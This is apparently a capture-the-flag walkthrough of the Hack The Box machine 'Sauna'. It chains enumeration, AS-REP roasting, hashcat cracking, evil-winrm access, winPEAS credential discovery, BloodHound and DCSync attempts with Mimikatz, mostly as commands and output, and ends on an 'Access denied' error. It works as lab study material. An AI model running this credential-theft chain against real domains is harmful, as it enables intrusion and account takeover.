Sauna

This is a windows machine from hack the box.

# Nmap 7.94 scan initiated Fri Aug 25 01:40:28 2023 as: nmap -sV -sC -oA sauna 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.28s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-08-25 12:40:54Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-
First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-
First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-08-25T12:41:11
|_  start_date: N/A
|_clock-skew: 6h59m58s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Aug 25 01:41:59 2023 -- 1 IP address (1 host up) scanned in 91.07 seconds

  • Enumerating SMB on port 445
┌──(kali㉿kali)-[~/HTB]
└─$ crackmapexec smb 10.10.10.175
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing LDAP protocol database
[*] Initializing SMB protocol database
[*] Initializing MSSQL protocol database
[*] Initializing RDP protocol database
[*] Initializing FTP protocol database
[*] Initializing WINRM protocol database
[*] Initializing SSH protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
SMB         10.10.10.175    445    SAUNA            [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)

Domain name is EGOTISTICAL-BANK.LOCA

Enumerating shares


└─$ crackmapexec smb 10.10.10.175 --shares
SMB         10.10.10.175    445    SAUNA            [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.175    445    SAUNA            [-] Error enumerating shares: STATUS_USER_SESSION_DELETED
                                                                                                                      
┌──(kali㉿kali)-[~/HTB]
└─$ crackmapexec smb 10.10.10.175 --shares -u '' -p ''
    
[*] completed: 100.00% (1/1)
SMB         10.10.10.175    445    SAUNA            [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.175    445    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\: 
SMB         10.10.10.175    445    SAUNA            [-] Error enumerating shares: STATUS_ACCESS_DENIED
                                                                                                                      
┌──(kali㉿kali)-[~/HTB]
└─$ smbmap -H 10.10.10.175 -u ''                      

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - [email protected]
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
[!] Something weird happened: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.) on line 947
Traceback (most recent call last):
  File "/usr/bin/smbmap", line 33, in <module>
    sys.exit(load_entry_point('smbmap==1.9.1', 'console_scripts', 'smbmap')())
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/smbmap/smbmap.py", line 1412, in main
    host = [ host for host in share_drives_list.keys() ][0]
                              ^^^^^^^^^^^^^^^^^^^^^^
AttributeError: 'bool' object has no attribute 'keys'

identified the machine as a Domain controler with the domain EGOTISTICAL-BANK.LOCAL0

Try rpcclient


                                                                                                                      
┌──(kali㉿kali)-[~/HTB]
└─$ rpcclient 10.10.10.175 -U ''
Password for [WORKGROUP\]:
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
                                                                                                                      
┌──(kali㉿kali)-[~/HTB]
└─$ 

Enumerating the web page on port 80. We see “The team” which will give us the possible users

Identified the users as

  • Fergus smith
  • Shaun Coins
  • Sophie Driver
  • Hugo Bear
  • Bowie Taylor
  • Steven Kerb

used chatGPT to generate possible usernames and created a txt file users.txt which will be a user list

Searching ldap to try abnd get usernames


┌──(kali㉿kali)-[~/HTB]
└─$ ldapsearch -x -H ldap://10.10.10.175 -s base namingcontexts

# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingcontexts: DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1
                                                                                                                      
┌──(kali㉿kali)-[~/HTB]
└─$ 


ldapsearch part 2 but we did not get any usernames

┌──(kali㉿kali)-[~/HTB]
└─$ ldapsearch -x -H ldap://10.10.10.175 -b 'DC=EGOTISTICAL-BANK,DC=LOCAL' -s sub
# extended LDIF
#
# LDAPv3
# base <DC=EGOTISTICAL-BANK,DC=LOCAL> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# EGOTISTICAL-BANK.LOCAL
dn: DC=EGOTISTICAL-BANK,DC=LOCAL
objectClass: top
objectClass: domain
objectClass: domainDNS
distinguishedName: DC=EGOTISTICAL-BANK,DC=LOCAL
instanceType: 5
whenCreated: 20200123054425.0Z
whenChanged: 20230825072320.0Z
subRefs: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
subRefs: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
subRefs: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
uSNCreated: 4099
dSASignature:: AQAAACgAAAAAAAAAAAAAAAAAAAAAAAAAQL7gs8Yl7ESyuZ/4XESy7A==
uSNChanged: 98336
name: EGOTISTICAL-BANK
objectGUID:: 7AZOUMEioUOTwM9IB/gzYw==
replUpToDateVector:: AgAAAAAAAAAGAAAAAAAAAEbG/1RIhXVKvwnC1AVq4o8WgAEAAAAAAOfn+
 BoDAAAAq4zveNFJhUSywu2cZf6vrQzgAAAAAAAAKDj+FgMAAADc0VSB8WEuQrRECkAJ5oR1FXABAA
 AAAADUbg8XAwAAAP1ahZJG3l5BqlZuakAj9gwL0AAAAAAAANDwChUDAAAAm/DFn2wdfEWLFfovGj4
 TThRgAQAAAAAAENUAFwMAAABAvuCzxiXsRLK5n/hcRLLsCbAAAAAAAADUBFIUAwAAAA==
creationTime: 133374218005585776
forceLogoff: -9223372036854775808
lockoutDuration: -18000000000
lockOutObservationWindow: -18000000000
lockoutThreshold: 0
maxPwdAge: -36288000000000
minPwdAge: -864000000000
minPwdLength: 7
modifiedCountAtLastProm: 0
nextRid: 1000
pwdProperties: 1
pwdHistoryLength: 24
objectSid:: AQQAAAAAAAUVAAAA+o7VsIowlbg+rLZG
serverState: 1
uASCompat: 1
modifiedCount: 1


  • Use a tool called kerbrute to try and identify valid user. You can use it to do a password spray without generating even code 4624 i.e quietly
  • Eventcode 4624 – Event code 4624 corresponds to a log entry in the Windows security event log, and it indicates a successful logon event.It’s a crucial event for forensic analysts and security professionals as it provides evidence of successful logon activities. Monitoring for an unusually high number of 4624 events, especially in a short time frame or from unfamiliar locations, might indicate a potential security concern like brute-force attacks or unauthorized access.github
  • Kebrute can be found https://github.com/ropnop/kerbrute

┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ chmod +x kerbrute                    
                                                                                                                      
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ ls
kerbrute  sauna.gnmap  sauna.nmap  sauna.xml  users.txt
                                                                                                                      
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ ./kerbrute

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 08/25/23 - Ronnie Flathers @ropnop

This tool is designed to assist in quickly bruteforcing valid Active Directory accounts through Kerberos Pre-Authentication.
It is designed to be used on an internal Windows domain with access to one of the Domain Controllers.
Warning: failed Kerberos Pre-Auth counts as a failed login and WILL lock out accounts

Usage:
  kerbrute [command]

Available Commands:
  bruteforce    Bruteforce username:password combos, from a file or stdin
  bruteuser     Bruteforce a single user's password from a wordlist
  help          Help about any command
  passwordspray Test a single password against a list of users
  userenum      Enumerate valid domain usernames via Kerberos
  version       Display version info and quit

Flags:
      --dc string       The location of the Domain Controller (KDC) to target. If blank, will lookup via DNS
      --delay int       Delay in millisecond between each attempt. Will always use single thread if set
  -d, --domain string   The full domain to use (e.g. contoso.com)
  -h, --help            help for kerbrute
  -o, --output string   File to write logs to. Optional.
      --safe            Safe mode. Will abort if any user comes back as locked out. Default: FALSE
  -t, --threads int     Threads to use (default 10)
  -v, --verbose         Log failures and errors

Use "kerbrute [command] --help" for more information about a command.
                                                                                                                      
┌──(kali㉿kali)-[~/HTB/Sauna]

  • using kerbrute
                                                                                                                      
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ ./kerbrute userenum --dc 10.10.10.175 -d  EGOTISTICAL-BANK.LOCAL users.txt    

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 08/25/23 - Ronnie Flathers @ropnop

2023/08/25 06:39:06 >  Using KDC(s):
2023/08/25 06:39:06 >   10.10.10.175:88

2023/08/25 06:39:07 >  [+] VALID USERNAME:       [email protected]
2023/08/25 06:39:07 >  [+] VALID USERNAME:       [email protected]
2023/08/25 06:39:08 >  Done! Tested 57 usernames (2 valid) in 1.870 seconds
                                                                                                                      
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ 
****

Use impacket

                                                                                                                            
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ls                                          
addcomputer.py     getArch.py          kintercept.py         ntfs-read.py      rpcdump.py      smbserver.py
atexec.py          Get-GPPPassword.py  lookupsid.py          ntlmrelayx.py     rpcmap.py       sniffer.py
changepasswd.py    GetNPUsers.py       machine_role.py       ping6.py          sambaPipe.py    sniff.py
dcomexec.py        getPac.py           mimikatz.py           ping.py           samrdump.py     split.py
dpapi.py           getST.py            mqtt_check.py         psexec.py         secretsdump.py  ticketConverter.py
DumpNTLMInfo.py    getTGT.py           mssqlclient.py        raiseChild.py     services.py     ticketer.py
esentutl.py        GetUserSPNs.py      mssqlinstance.py      rbcd.py           smbclient.py    tstool.py
exchanger.py       goldenPac.py        net.py                rdp_check.py      smbexec.py      wmiexec.py
findDelegation.py  karmaSMB.py         netview.py            registry-read.py  smbpasswd.py    wmipersist.py
GetADUsers.py      keylistattack.py    nmapAnswerMachine.py  reg.py            smbrelayx.py    wmiquery.py

Use impacket script GetNPusers.py. This is a tool from the Impacket suite, designed to exploit a misconfiguration in Active Directory that could allow an attacker to retrieve valid username and NTLM hashes from a domain, without having any account credentials initially.

Using GetNPusers.py. But fist we have to add to host file

Using GetNPusers.py tried on administrator and fsmith

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py EGOTISTICAL-BANK.LOCAL/administrator
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Cannot authenticate administrator, getting its TGT
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set

on fsmith


┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py EGOTISTICAL-BANK.LOCAL/fsmith
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Cannot authenticate fsmith, getting its TGT
[email protected]:70311dacc7f5a33fcf57295a8fc26f5c$66be8037a4348d14299f81c374f5264f7bdde85c821ef83864e7afa14348a85aac6eb3ec4ed01392815fb12cc9fcb420e9c68d9169a4243fcee3412e3802910ced76fe5c03f6a6a66009a7d0a53ec889e43e08dd61cb3ec8abaa772f24249381551e53e695d9a3906569a0de98b4d755da5654bc6ec6fbb27ba896208078eb160bc0326d223fa3c763e6340d5e47b4bad4d508662a273296480d59b79b3fdff972fce916bdf04afcbaea487cb355301e3588f468ed33dbef6fb980e50ad974b03689e98811d97b9806acf95b4fcdf05cfed8401a1282a43cb834538a7548df6e0674cbca3e139de2088c2593109f858300e758a6cae98dfd0f947336b7c22fd4
                                                                                                                            
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]

We have the hash and now we use hashcat to try and crack it

used the command

./hashcat --example-hashes | grep asrep

./hashcat --example-hashes | less 

then search asrep using / asrep

We get hashmode 18200

Hash mode #18200
  Name................: Kerberos 5, etype 23, AS-REP
  Category............: Network Protocol
  Slow.Hash...........: No
  Password.Len.Min....: 0
  Password.Len.Max....: 256
  Salt.Type...........: Embedded
  Salt.Len.Min........: 0
  Salt.Len.Max........: 256
  Kernel.Type(s)......: pure, optimized
  Example.Hash.Format.: plain
  Example.Hash........: [email protected]:3e156ada591263b8a...102ac [Truncated, use --mach for full length]
  Example.Pass........: hashcat
  Benchmark.Mask......: ?b?b?b?b?b?b?b
  Autodetect.Enabled..: Yes
  Self.Test.Enabled...: Yes
  Potfile.Enabled.....: Yes
  Custom.Plugin.......: No
  Plaintext.Encoding..: ASCII, HEX

Copy the hash into a file called sauna


└─$ cat sauna         
[email protected]:70311dacc7f5a33fcf57295a8fc26f5c$66be8037a4348d14299f81c374f5264f7bdde85c821ef83864e7afa14348a85aac6eb3ec4ed01392815fb12cc9fcb420e9c68d9169a4243fcee3412e3802910ced76fe5c03f6a6a66009a7d0a53ec889e43e08dd61cb3ec8abaa772f24249381551e53e695d9a3906569a0de98b4d755da5654bc6ec6fbb27ba896208078eb160bc0326d223fa3c763e6340d5e47b4bad4d508662a273296480d59b79b3fdff972fce916bdf04afcbaea487cb355301e3588f468ed33dbef6fb980e50ad974b03689e98811d97b9806acf95b4fcdf05cfed8401a1282a43cb834538a7548df6e0674cbca3e139de2088c2593109f858300e758a6cae98dfd0f947336b7c22fd4
                                                                                                                            
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ 

Run hashcat


                                                                                                                            
┌──(kali㉿kali)-[/usr/bin]
└─$ ./hashcat -m 18200 /home/kali/HTB/Sauna/sauna /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting

Get the password – Thestrokes23



[email protected]:70311dacc7f5a33fcf57295a8fc26f5c$66be8037a4348d14299f81c374f5264f7bdde85c821ef83864e7afa14348a85aac6eb3ec4ed01392815fb12cc9fcb420e9c68d9169a4243fcee3412e3802910ced76fe5c03f6a6a66009a7d0a53ec889e43e08dd61cb3ec8abaa772f24249381551e53e695d9a3906569a0de98b4d755da5654bc6ec6fbb27ba896208078eb160bc0326d223fa3c763e6340d5e47b4bad4d508662a273296480d59b79b3fdff972fce916bdf04afcbaea487cb355301e3588f468ed33dbef6fb980e50ad974b03689e98811d97b9806acf95b4fcdf05cfed8401a1282a43cb834538a7548df6e0674cbca3e139de2088c2593109f858300e758a6cae98dfd0f947336b7c22fd4:Thestrokes23

Run crackmapexec


┌──(kali㉿kali)-[/usr/bin]
└─$ crackmapexec smb 10.10.10.175 --shares -u fsmith -p Thestrokes23
SMB         10.10.10.175    445    SAUNA            [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.175    445    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 
SMB         10.10.10.175    445    SAUNA            [+] Enumerated shares
SMB         10.10.10.175    445    SAUNA            Share           Permissions     Remark
SMB         10.10.10.175    445    SAUNA            -----           -----------     ------
SMB         10.10.10.175    445    SAUNA            ADMIN$                          Remote Admin
SMB         10.10.10.175    445    SAUNA            C$                              Default share
SMB         10.10.10.175    445    SAUNA            IPC$            READ            Remote IPC
SMB         10.10.10.175    445    SAUNA            NETLOGON        READ            Logon server share 
SMB         10.10.10.175    445    SAUNA            print$          READ            Printer Drivers
SMB         10.10.10.175    445    SAUNA            RICOH Aficio SP 8300DN PCL 6                 We cant print money
SMB         10.10.10.175    445    SAUNA            SYSVOL          READ            Logon server share 

Try crackexec wrm (windows remote) which will tell us if we can get to the box which it does


┌──(kali㉿kali)-[/usr/bin]
└─$ crackmapexec winrm 10.10.10.175 -u fsmith -p Thestrokes23 
SMB         10.10.10.175    5985   SAUNA            [*] Windows 10.0 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
HTTP        10.10.10.175    5985   SAUNA            [*] http://10.10.10.175:5985/wsman
WINRM       10.10.10.175    5985   SAUNA            [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 (Pwn3d!)

We use evil-winrm


┌──(kali㉿kali)-[/usr/bin]
└─$ evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> cd..
*Evil-WinRM* PS C:\Users\FSmith> ls


    Directory: C:\Users\FSmith


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        1/23/2020  10:01 AM                Desktop
d-r---        1/24/2020  10:40 AM                Documents
d-r---        9/15/2018  12:19 AM                Downloads
d-r---        9/15/2018  12:19 AM                Favorites
d-r---        9/15/2018  12:19 AM                Links
d-r---        9/15/2018  12:19 AM                Music
d-r---        9/15/2018  12:19 AM                Pictures
d-----        9/15/2018  12:19 AM                Saved Games
d-r---        9/15/2018  12:19 AM                Videos


*Evil-WinRM* PS C:\Users\FSmith> cd Desktop
*Evil-WinRM* PS C:\Users\FSmith\Desktop> ls


    Directory: C:\Users\FSmith\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        8/25/2023  12:24 AM             34 user.txt


*Evil-WinRM* PS C:\Users\FSmith\Desktop> cat user.txt
d3e2c4cf72ed6d184ea0905f9f67ef1d
*Evil-WinRM* PS C:\Users\FSmith\Desktop> 

Upload and run winPEAS


Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> upload /home/kali/HTB/Sauna/winPEASx64.exe
                                        
Info: Uploading /home/kali/HTB/Sauna/winPEASx64.exe to C:\Users\FSmith\Documents\winPEASx64.exe
                                        
Data: 3183956 bytes of 3183956 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\FSmith\Documents> ./winPEASx64.exe

The following credentials is of interest


ÉÍÍÍÍÍÍÍÍÍ͹ Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!

Check the domain user


*Evil-WinRM* PS C:\Users\FSmith\Documents> net user /domain svc_loanmgr
User name                    svc_loanmgr
Full Name                    L Manager
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/24/2020 4:48:31 PM
Password expires             Never
Password changeable          1/25/2020 4:48:31 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\FSmith\Documents> 

We go for bloodhound

fist we install bloodhound

──(kali㉿kali)-[~]
└─$ sudo apt install bloodhound    
[sudo] password for kali: 
Sorry, try again.
[sudo] password for kali: 


Download sharphound.exe from github https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors

upload sharphound and run it from the windows machine./s


*Evil-WinRM* PS C:\Users\FSmith\Documents> upload /home/kali/HTB/Sauna/SharpHound.exe
                                        
Info: Uploading /home/kali/HTB/Sauna/SharpHound.exe to C:\Users\FSmith\Documents\SharpHound.exe
                                        
Data: 1395368 bytes of 1395368 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\FSmith\Documents> ./SharpHound.exe
2023-08-25T13:19:26.1522551-07:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2023-08-25T13:19:26.3241396-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-08-25T13:19:26.3553912-07:00|INFORMATION|Initializing SharpHound at 1:19 PM on 8/25/2023
2023-08-25T13:19:26.5429038-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for EGOTISTICAL-BANK.LOCAL : SAUNA.EGOTISTICAL-BANK.LOCAL

2023-08-25T13:19:50.6366275-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-08-25T13:19:50.8397517-07:00|INFORMATION|Beginning LDAP search for EGOTISTICAL-BANK.LOCAL
2023-08-25T13:19:50.9022664-07:00|INFORMATION|Producer has finished, closing LDAP channel
2023-08-25T13:19:50.9022664-07:00|INFORMATION|LDAP channel closed, waiting for consumers


download the zip file

*Evil-WinRM* PS C:\Users\FSmith\Documents> ls


    Directory: C:\Users\FSmith\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        8/25/2023   1:20 PM          11690 20230825132046_BloodHound.zip
-a----        8/25/2023   1:18 PM        1046528 SharpHound.exe
-a----        8/25/2023  12:58 PM        2387968 winPEASx64.exe
-a----        8/25/2023   1:20 PM           8601 ZDFkMDEyYjYtMmE1ZS00YmY3LTk0OWItYTM2OWVmMjc5NDVk.bin


*Evil-WinRM* PS C:\Users\FSmith\Documents> download 20230825132046_BloodHound.zip

Launch bloodhound

                                                                                                                            
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ bloodhound

but before, we need to set the password


┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ sudo neo4j console         
Directories in use:
home:         /usr/share/neo4j
config:       /usr/share/neo4j/conf
logs:         /etc/neo4j/logs
plugins:      /usr/share/neo4j/plugins
import:       /usr/share/neo4j/import
data:         /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses:     /usr/share/neo4j/licenses
run:          /var/lib/neo4j/run
Starting Neo4j.
2023-08-25 13:25:56.918+0000 INFO  Starting...
2023-08-25 13:25:57.564+0000 INFO  This instance is ServerId{012fd76f} (012fd76f-f868-4f49-8648-df3c0a92529c)
2023-08-25 13:25:59.855+0000 INFO  ======== Neo4j 4.4.16 ========
2023-08-25 13:26:04.131+0000 INFO  Initializing system graph model for component 'security-users' with version -1 and status UNINITIALIZED
2023-08-25 13:26:04.154+0000 INFO  Setting up initial user from defaults: neo4j
2023-08-25 13:26:04.155+0000 INFO  Creating new user 'neo4j' (passwordChangeRequired=true, suspended=false)
2023-08-25 13:26:04.181+0000 INFO  Setting version for 'security-users' to 3
2023-08-25 13:26:04.188+0000 INFO  After initialization of system graph model component 'security-users' have version 3 and status CURRENT
2023-08-25 13:26:04.197+0000 INFO  Performing postInitialization step for component 'security-users' with version 3 and status CURRENT
2023-08-25 13:26:04.656+0000 INFO  Bolt enabled on localhost:7687.
2023-08-25 13:26:06.692+0000 INFO  Remote interface available at http://localhost:7474/
2023-08-25 13:26:06.699+0000 INFO  id: 09D349E0C9FBBE2765953B684D37451EC5B3E5498A047128F86F8D612D552499
2023-08-25 13:26:06.700+0000 INFO  name: system
2023-08-25 13:26:06.700+0000 INFO  creationDate: 2023-08-25T13:26:01.864Z
2023-08-25 13:26:06.700+0000 INFO  Started.


Go to http://localhost:7474/ and change the password

login to bloodhond with tyhe username/password

Drag and drop the zip file to bloodhound

type svc at the top search. Then do the same for fsmith

mark svc and fsmith as owned

Go to queries, shortest path from owned principles

Click on Find prinicples with DCsync rights then rignt click on the link

we can use mimikazt for dcsync

We can try using mimikatz but impacket also has dcsync

option 1 – using mimikatz. Uploaded mimikatz to the windows machine. The mimikatz can be found in https://github.com/ParrotSec/mimikatz

This didnt work when running mimikatz.its stuck in a loop

using impacket — secretsdump.py

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./secretsdump.py egotistical-bank.local/[email protected]                                                      


Impacket secretsdump.py failed numerous times with permission denied

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./secretsdump.py egotistical-bank.local/[email protected]
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] Cannot create "sessionresume_qmeaJHgo" resume session file: [Errno 13] Permission denied: 'sessionresume_qmeaJHgo'
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up... 
                                                                                                                                                                                                                 
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]


Gooing back to try the mimikatz route but this time using Invoke-Mimikatz.ps1

I got this from wget https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1 then uploaded it to the machine


┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ wget https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1
--2023-08-27 06:29:42--  https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.110.133, 185.199.111.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 677282 (661K) [text/plain]
Saving to: ‘Invoke-Mimikatz.ps1’

Invoke-Mimikatz.ps1                                  100%[===================================================================================================================>] 661.41K  --.-KB/s    in 0.07s   

2023-08-27 06:29:42 (8.71 MB/s) - ‘Invoke-Mimikatz.ps1’ saved [677282/677282]

                                                                                                                                                                                                                 
┌──(kali㉿kali)-[~/HTB/Sauna]

upload and run on the machine

There was issues running the Invoke -Mimikatz but found this article https://github.com/mitre/caldera/issues/38


Change the following line 886:  
`$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')`

To

`$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [reflection.bindingflags] "Public,Static", $null, [System.Reflection.CallingConventions]::Any, @((New-Object System.Runtime.InteropServices.HandleRef).GetType(), [string]), $null);`

When we used this it now worked. Use user svc_loanmgr

┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ evil-winrm -i 10.10.10.175 -u svc_loanmgr -p Moneymakestheworldgoround!
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> ls
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> upload /home/kali/HTB/Sauna/Invoke-Mimikatz.ps1
                                        
Info: Uploading /home/kali/HTB/Sauna/Invoke-Mimikatz.ps1 to C:\Users\svc_loanmgr\Documents\Invoke-Mimikatz.ps1
                                        
Data: 3215032 bytes of 3215032 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> . .\Invoke-Mimikatz.ps1
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> Invoke-Mimikatz -Command '"lsadump::dcsync /domain:Egotistical-bank.local /user:Administrator"'
Access denied 
At C:\Users\svc_loanmgr\Documents\Invoke-Mimikatz.ps1:2579 char:27
